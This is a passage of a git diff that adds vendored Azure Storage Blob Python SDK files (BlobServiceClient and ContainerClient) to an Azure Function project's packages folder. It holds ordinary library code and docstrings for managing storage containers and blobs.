-> ContainerClient + """Get a client to interact with the blob's parent container. + + The container need not already exist. Defaults to current blob's credentials. + + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START get_container_client_from_blob_client] + :end-before: [END get_container_client_from_blob_client] + :language: python + :dedent: 8 + :caption: Get container client from blob object. + """ + from ._container_client import ContainerClient + if not isinstance(self._pipeline._transport, TransportWrapper): # pylint: disable = protected-access + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=self.container_name, + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_service_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_service_client.py new file mode 100644 index 0000000..bff232d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_service_client.py @@ -0,0 +1,740 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import functools +import warnings +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, + TYPE_CHECKING, + TypeVar) + + +try: + from urllib.parse import urlparse +except ImportError: + from urlparse import urlparse # type: ignore + +from azure.core.paging import ItemPaged +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline import Pipeline +from azure.core.tracing.decorator import distributed_trace + +from ._shared.models import LocationMode +from ._shared.base_client import StorageAccountHostsMixin, TransportWrapper, parse_connection_str, parse_query +from ._shared.parser import _to_utc_datetime +from ._shared.response_handlers import return_response_headers, process_storage_error, \ + parse_to_internal_user_delegation_key +from ._generated import AzureBlobStorage +from ._generated.models import StorageServiceProperties, KeyInfo +from ._container_client import ContainerClient +from ._blob_client import BlobClient +from ._models import ContainerPropertiesPaged +from ._list_blobs_helper import FilteredBlobPaged +from ._serialize import get_api_version +from ._deserialize import service_stats_deserialize, service_properties_deserialize + +if TYPE_CHECKING: + from datetime import datetime + from ._shared.models import UserDelegationKey + from ._lease import BlobLeaseClient + from ._models import ( + ContainerProperties, + BlobProperties, + PublicAccess, + BlobAnalyticsLogging, + Metrics, + CorsRule, + RetentionPolicy, + StaticWebsite, + FilteredBlob + ) + +ClassType = TypeVar("ClassType") + + +class BlobServiceClient(StorageAccountHostsMixin): + """A client to interact with the Blob Service at the account level. + + This client provides operations to retrieve and configure the account properties + as well as list, create and delete containers within the account. + For operations relating to a specific container or blob, clients for those entities + can also be retrieved using the `get_client` functions. + + For more optional configuration, please click + `here `_. + + :param str account_url: + The URL to the blob storage account. Any other entities included + in the URL path (e.g. container or blob) will be discarded. This URL can be optionally + authenticated with a SAS token. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_blob_service_client] + :end-before: [END create_blob_service_client] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with account url and credential. + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_blob_service_client_oauth] + :end-before: [END create_blob_service_client_oauth] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with Azure Identity credentials. + """ + + def __init__( + self, account_url, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + try: + if not account_url.lower().startswith('http'): + account_url = "https://" + account_url + except AttributeError: + raise ValueError("Account URL must be a string.") + parsed_url = urlparse(account_url.rstrip('/')) + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(account_url)) + + _, sas_token = parse_query(parsed_url.query) + self._query_str, credential = self._format_query_string(sas_token, credential) + super(BlobServiceClient, self).__init__(parsed_url, service='blob', credential=credential, **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + def _format_url(self, hostname): + """Format the endpoint URL according to the current location + mode hostname. + """ + return "{}://{}/{}".format(self.scheme, hostname, self._query_str) + + @classmethod + def from_connection_string( + cls, # type: Type[ClassType] + conn_str, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): # type: (...) -> ClassType + """Create BlobServiceClient from a Connection String. + + :param str conn_str: + A connection string to an Azure Storage account. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. + Credentials provided here will take precedence over those in the connection string. + :returns: A Blob service client. + :rtype: ~azure.storage.blob.BlobServiceClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START auth_from_connection_string] + :end-before: [END auth_from_connection_string] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient from a connection string. + """ + account_url, secondary, credential = parse_connection_str(conn_str, credential, 'blob') + if 'secondary_hostname' not in kwargs: + kwargs['secondary_hostname'] = secondary + return cls(account_url, credential=credential, **kwargs) + + @distributed_trace + def get_user_delegation_key(self, key_start_time, # type: datetime + key_expiry_time, # type: datetime + **kwargs # type: Any + ): + # type: (...) -> UserDelegationKey + """ + Obtain a user delegation key for the purpose of signing SAS tokens. + A token credential must be present on the service object for this request to succeed. + + :param ~datetime.datetime key_start_time: + A DateTime value. Indicates when the key becomes valid. + :param ~datetime.datetime key_expiry_time: + A DateTime value. Indicates when the key stops being valid. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: The user delegation key. + :rtype: ~azure.storage.blob.UserDelegationKey + """ + key_info = KeyInfo(start=_to_utc_datetime(key_start_time), expiry=_to_utc_datetime(key_expiry_time)) + timeout = kwargs.pop('timeout', None) + try: + user_delegation_key = self._client.service.get_user_delegation_key(key_info=key_info, + timeout=timeout, + **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + return parse_to_internal_user_delegation_key(user_delegation_key) # type: ignore + + @distributed_trace + def get_account_information(self, **kwargs): + # type: (Any) -> Dict[str, str] + """Gets information related to the storage account. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_account_info] + :end-before: [END get_blob_service_account_info] + :language: python + :dedent: 8 + :caption: Getting account information for the blob service. + """ + try: + return self._client.service.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def get_service_stats(self, **kwargs): + # type: (**Any) -> Dict[str, Any] + """Retrieves statistics related to replication for the Blob service. + + It is only available when read-access geo-redundant replication is enabled for + the storage account. + + With geo-redundant replication, Azure Storage maintains your data durable + in two locations. In both locations, Azure Storage constantly maintains + multiple healthy replicas of your data. The location where you read, + create, update, or delete data is the primary storage account location. + The primary location exists in the region you choose at the time you + create an account via the Azure Management Azure classic portal, for + example, North Central US. The location to which your data is replicated + is the secondary location. The secondary location is automatically + determined based on the location of the primary; it is in a second data + center that resides in the same region as the primary location. Read-only + access is available from the secondary location, if read-access geo-redundant + replication is enabled for your storage account. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: The blob service stats. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_stats] + :end-before: [END get_blob_service_stats] + :language: python + :dedent: 8 + :caption: Getting service stats for the blob service. + """ + timeout = kwargs.pop('timeout', None) + try: + stats = self._client.service.get_statistics( # type: ignore + timeout=timeout, use_location=LocationMode.SECONDARY, **kwargs) + return service_stats_deserialize(stats) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def get_service_properties(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Gets the properties of a storage account's Blob service, including + Azure Storage Analytics. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An object containing blob service properties such as + analytics logging, hour/minute metrics, cors rules, etc. + :rtype: Dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_properties] + :end-before: [END get_blob_service_properties] + :language: python + :dedent: 8 + :caption: Getting service properties for the blob service. + """ + timeout = kwargs.pop('timeout', None) + try: + service_props = self._client.service.get_properties(timeout=timeout, **kwargs) + return service_properties_deserialize(service_props) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def set_service_properties( + self, analytics_logging=None, # type: Optional[BlobAnalyticsLogging] + hour_metrics=None, # type: Optional[Metrics] + minute_metrics=None, # type: Optional[Metrics] + cors=None, # type: Optional[List[CorsRule]] + target_version=None, # type: Optional[str] + delete_retention_policy=None, # type: Optional[RetentionPolicy] + static_website=None, # type: Optional[StaticWebsite] + **kwargs + ): + # type: (...) -> None + """Sets the properties of a storage account's Blob service, including + Azure Storage Analytics. + + If an element (e.g. analytics_logging) is left as None, the + existing settings on the service for that functionality are preserved. + + :param analytics_logging: + Groups the Azure Analytics Logging settings. + :type analytics_logging: ~azure.storage.blob.BlobAnalyticsLogging + :param hour_metrics: + The hour metrics settings provide a summary of request + statistics grouped by API in hourly aggregates for blobs. + :type hour_metrics: ~azure.storage.blob.Metrics + :param minute_metrics: + The minute metrics settings provide request statistics + for each minute for blobs. + :type minute_metrics: ~azure.storage.blob.Metrics + :param cors: + You can include up to five CorsRule elements in the + list. If an empty list is specified, all CORS rules will be deleted, + and CORS will be disabled for the service. + :type cors: list[~azure.storage.blob.CorsRule] + :param str target_version: + Indicates the default version to use for requests if an incoming + request's version is not specified. + :param delete_retention_policy: + The delete retention policy specifies whether to retain deleted blobs. + It also specifies the number of days and versions of blob to keep. + :type delete_retention_policy: ~azure.storage.blob.RetentionPolicy + :param static_website: + Specifies whether the static website feature is enabled, + and if yes, indicates the index document and 404 error document to use. + :type static_website: ~azure.storage.blob.StaticWebsite + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START set_blob_service_properties] + :end-before: [END set_blob_service_properties] + :language: python + :dedent: 8 + :caption: Setting service properties for the blob service. + """ + if all(parameter is None for parameter in [ + analytics_logging, hour_metrics, minute_metrics, cors, + target_version, delete_retention_policy, static_website]): + raise ValueError("set_service_properties should be called with at least one parameter") + + props = StorageServiceProperties( + logging=analytics_logging, + hour_metrics=hour_metrics, + minute_metrics=minute_metrics, + cors=cors, + default_service_version=target_version, + delete_retention_policy=delete_retention_policy, + static_website=static_website + ) + timeout = kwargs.pop('timeout', None) + try: + self._client.service.set_properties(props, timeout=timeout, **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def list_containers( + self, name_starts_with=None, # type: Optional[str] + include_metadata=False, # type: Optional[bool] + **kwargs + ): + # type: (...) -> ItemPaged[ContainerProperties] + """Returns a generator to list the containers under the specified account. + + The generator will lazily follow the continuation tokens returned by + the service and stop when all containers have been returned. + + :param str name_starts_with: + Filters the results to return only containers whose names + begin with the specified prefix. + :param bool include_metadata: + Specifies that container metadata to be returned in the response. + The default value is `False`. + :keyword bool include_deleted: + Specifies that deleted containers to be returned in the response. This is for container restore enabled + account. The default value is `False`. + .. versionadded:: 12.4.0 + :keyword bool include_system: + Flag specifying that system containers should be included. + .. versionadded:: 12.10.0 + :keyword int results_per_page: + The maximum number of container names to retrieve per API + call. If the request does not specify the server will return up to 5,000 items. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) of ContainerProperties. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.ContainerProperties] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_list_containers] + :end-before: [END bsc_list_containers] + :language: python + :dedent: 12 + :caption: Listing the containers in the blob service. + """ + include = ['metadata'] if include_metadata else [] + include_deleted = kwargs.pop('include_deleted', None) + if include_deleted: + include.append("deleted") + include_system = kwargs.pop('include_system', None) + if include_system: + include.append("system") + + timeout = kwargs.pop('timeout', None) + results_per_page = kwargs.pop('results_per_page', None) + command = functools.partial( + self._client.service.list_containers_segment, + prefix=name_starts_with, + include=include, + timeout=timeout, + **kwargs) + return ItemPaged( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + page_iterator_class=ContainerPropertiesPaged + ) + + @distributed_trace + def find_blobs_by_tags(self, filter_expression, **kwargs): + # type: (str, **Any) -> ItemPaged[FilteredBlob] + """The Filter Blobs operation enables callers to list blobs across all + containers whose tags match a given search expression. Filter blobs + searches across all containers within a storage account but can be + scoped within the expression to a single container. + + :param str filter_expression: + The expression to find blobs whose tags matches the specified condition. + eg. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'" + To specify a container, eg. "@container='containerName' and \"Name\"='C'" + :keyword int results_per_page: + The max result per page when paginating. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.FilteredBlob] + """ + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.service.filter_blobs, + where=filter_expression, + timeout=timeout, + **kwargs) + return ItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=FilteredBlobPaged) + + @distributed_trace + def create_container( + self, name, # type: str + metadata=None, # type: Optional[Dict[str, str]] + public_access=None, # type: Optional[Union[PublicAccess, str]] + **kwargs + ): + # type: (...) -> ContainerClient + """Creates a new container under the specified account. + + If the container with the same name already exists, a ResourceExistsError will + be raised. This method returns a client with which to interact with the newly + created container. + + :param str name: The name of the container to create. + :param metadata: + A dict with name-value pairs to associate with the + container as metadata. Example: `{'Category':'test'}` + :type metadata: dict(str, str) + :param public_access: + Possible values include: 'container', 'blob'. + :type public_access: str or ~azure.storage.blob.PublicAccess + :keyword container_encryption_scope: + Specifies the default encryption scope to set on the container and use for + all future writes. + + .. versionadded:: 12.2.0 + + :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_create_container] + :end-before: [END bsc_create_container] + :language: python + :dedent: 12 + :caption: Creating a container in the blob service. + """ + container = self.get_container_client(name) + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + container.create_container( + metadata=metadata, public_access=public_access, timeout=timeout, **kwargs) + return container + + @distributed_trace + def delete_container( + self, container, # type: Union[ContainerProperties, str] + lease=None, # type: Optional[Union[BlobLeaseClient, str]] + **kwargs + ): + # type: (...) -> None + """Marks the specified container for deletion. + + The container and any blobs contained within it are later deleted during garbage collection. + If the container is not found, a ResourceNotFoundError will be raised. + + :param container: + The container to delete. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :param lease: + If specified, delete_container only succeeds if the + container's lease is active and matches this ID. + Required if the container has an active lease. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_delete_container] + :end-before: [END bsc_delete_container] + :language: python + :dedent: 12 + :caption: Deleting a container in the blob service. + """ + container = self.get_container_client(container) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + container.delete_container( # type: ignore + lease=lease, + timeout=timeout, + **kwargs) + + @distributed_trace + def _rename_container(self, name, new_name, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Renames a container. + + Operation is successful only if the source container exists. + + :param str name: + The name of the container to rename. + :param str new_name: + The new container name the user wants to rename to. + :keyword lease: + Specify this to perform only if the lease ID given + matches the active lease ID of the source container. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + """ + renamed_container = self.get_container_client(new_name) + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + renamed_container._client.container.rename(name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def undelete_container(self, deleted_container_name, deleted_container_version, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Restores soft-deleted container. + + Operation will only be successful if used within the specified number of days + set in the delete retention policy. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :param str deleted_container_name: + Specifies the name of the deleted container to restore. + :param str deleted_container_version: + Specifies the version of the deleted container to restore. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + """ + new_name = kwargs.pop('new_name', None) + if new_name: + warnings.warn("`new_name` is no longer supported.", DeprecationWarning) + container = self.get_container_client(new_name or deleted_container_name) + try: + container._client.container.restore(deleted_container_name=deleted_container_name, # pylint: disable = protected-access + deleted_container_version=deleted_container_version, + timeout=kwargs.pop('timeout', None), **kwargs) + return container + except HttpResponseError as error: + process_storage_error(error) + + def get_container_client(self, container): + # type: (Union[ContainerProperties, str]) -> ContainerClient + """Get a client to interact with the specified container. + + The container need not already exist. + + :param container: + The container. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_get_container_client] + :end-before: [END bsc_get_container_client] + :language: python + :dedent: 8 + :caption: Getting the container client to interact with a specific container. + """ + try: + container_name = container.name + except AttributeError: + container_name = container + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return ContainerClient( + self.url, container_name=container_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + + def get_blob_client( + self, container, # type: Union[ContainerProperties, str] + blob, # type: Union[BlobProperties, str] + snapshot=None # type: Optional[Union[Dict[str, Any], str]] + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. + + :param container: + The container that the blob is in. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :param blob: + The blob with which to interact. This can either be the name of the blob, + or an instance of BlobProperties. + :type blob: str or ~azure.storage.blob.BlobProperties + :param snapshot: + The optional blob snapshot on which to operate. This can either be the ID of the snapshot, + or a dictionary output returned by :func:`~azure.storage.blob.BlobClient.create_snapshot()`. + :type snapshot: str or dict(str, Any) + :returns: A BlobClient. + :rtype: ~azure.storage.blob.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START bsc_get_blob_client] + :end-before: [END bsc_get_blob_client] + :language: python + :dedent: 12 + :caption: Getting the blob client to interact with a specific blob. + """ + try: + container_name = container.name + except AttributeError: + container_name = container + try: + blob_name = blob.name + except AttributeError: + blob_name = blob + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( # type: ignore + self.url, container_name=container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_container_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_container_client.py new file mode 100644 index 0000000..2444069 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_container_client.py @@ -0,0 +1,1612 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import functools +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, AnyStr, Dict, List, Tuple, IO, Iterator, + TYPE_CHECKING, + TypeVar) + + +try: + from urllib.parse import urlparse, quote, unquote +except ImportError: + from urlparse import urlparse # type: ignore + from urllib2 import quote, unquote # type: ignore + +import six + +from azure.core import MatchConditions +from azure.core.exceptions import HttpResponseError, ResourceNotFoundError +from azure.core.paging import ItemPaged +from azure.core.tracing.decorator import distributed_trace +from azure.core.pipeline import Pipeline +from azure.core.pipeline.transport import HttpRequest + +from ._shared.base_client import StorageAccountHostsMixin, TransportWrapper, parse_connection_str, parse_query +from ._shared.request_handlers import add_metadata_headers, serialize_iso +from ._shared.response_handlers import ( + process_storage_error, + return_response_headers, + return_headers_and_deserialized) +from ._generated import AzureBlobStorage +from ._generated.models import SignedIdentifier +from ._deserialize import deserialize_container_properties +from ._serialize import get_modify_conditions, get_container_cpk_scope_info, get_api_version, get_access_conditions +from ._models import ( # pylint: disable=unused-import + ContainerProperties, + BlobProperties, + BlobType, + FilteredBlob) +from ._list_blobs_helper import BlobPrefix, BlobPropertiesPaged, FilteredBlobPaged +from ._lease import BlobLeaseClient +from ._blob_client import BlobClient + +if TYPE_CHECKING: + from azure.core.pipeline.transport import HttpTransport, HttpResponse # pylint: disable=ungrouped-imports + from azure.core.pipeline.policies import HTTPPolicy # pylint: disable=ungrouped-imports + from datetime import datetime + from ._models import ( # pylint: disable=unused-import + PublicAccess, + AccessPolicy, + ContentSettings, + StandardBlobTier, + PremiumPageBlobTier) + + +def _get_blob_name(blob): + """Return the blob name. + + :param blob: A blob string or BlobProperties + :rtype: str + """ + try: + return blob.get('name') + except AttributeError: + return blob + + +ClassType = TypeVar("ClassType") + + +class ContainerClient(StorageAccountHostsMixin): # pylint: disable=too-many-public-methods + """A client to interact with a specific container, although that container + may not yet exist. + + For operations relating to a specific blob within this container, a blob client can be + retrieved using the :func:`~get_blob_client` function. + + For more optional configuration, please click + `here `_. + + :param str account_url: + The URI to the storage account. In order to create a client given the full URI to the container, + use the :func:`from_container_url` classmethod. + :param container_name: + The name of the container for the blob. + :type container_name: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START create_container_client_from_service] + :end-before: [END create_container_client_from_service] + :language: python + :dedent: 8 + :caption: Get a ContainerClient from an existing BlobServiceClient. + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START create_container_client_sasurl] + :end-before: [END create_container_client_sasurl] + :language: python + :dedent: 8 + :caption: Creating the container client directly. + """ + def __init__( + self, account_url, # type: str + container_name, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + try: + if not account_url.lower().startswith('http'): + account_url = "https://" + account_url + except AttributeError: + raise ValueError("Container URL must be a string.") + parsed_url = urlparse(account_url.rstrip('/')) + if not container_name: + raise ValueError("Please specify a container name.") + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(account_url)) + + _, sas_token = parse_query(parsed_url.query) + self.container_name = container_name + # This parameter is used for the hierarchy traversal. Give precedence to credential. + self._raw_credential = credential if credential else sas_token + self._query_str, credential = self._format_query_string(sas_token, credential) + super(ContainerClient, self).__init__(parsed_url, service='blob', credential=credential, **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + def _format_url(self, hostname): + container_name = self.container_name + if isinstance(container_name, six.text_type): + container_name = container_name.encode('UTF-8') + return "{}://{}/{}{}".format( + self.scheme, + hostname, + quote(container_name), + self._query_str) + + @classmethod + def from_container_url(cls, container_url, credential=None, **kwargs): + # type: (Type[ClassType], str, Optional[Any], Any) -> ClassType + """Create ContainerClient from a container url. + + :param str container_url: + The full endpoint URL to the Container, including SAS token if used. This could be + either the primary endpoint, or the secondary endpoint depending on the current `location_mode`. + :type container_url: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :returns: A container client. + :rtype: ~azure.storage.blob.ContainerClient + """ + try: + if not container_url.lower().startswith('http'): + container_url = "https://" + container_url + except AttributeError: + raise ValueError("Container URL must be a string.") + parsed_url = urlparse(container_url.rstrip('/')) + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(container_url)) + + container_path = parsed_url.path.lstrip('/').split('/') + account_path = "" + if len(container_path) > 1: + account_path = "/" + "/".join(container_path[:-1]) + account_url = "{}://{}{}?{}".format( + parsed_url.scheme, + parsed_url.netloc.rstrip('/'), + account_path, + parsed_url.query) + container_name = unquote(container_path[-1]) + if not container_name: + raise ValueError("Invalid URL. Please provide a URL with a valid container name") + return cls(account_url, container_name=container_name, credential=credential, **kwargs) + + @classmethod + def from_connection_string( + cls, # type: Type[ClassType] + conn_str, # type: str + container_name, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): # type: (...) -> ClassType + """Create ContainerClient from a Connection String. + + :param str 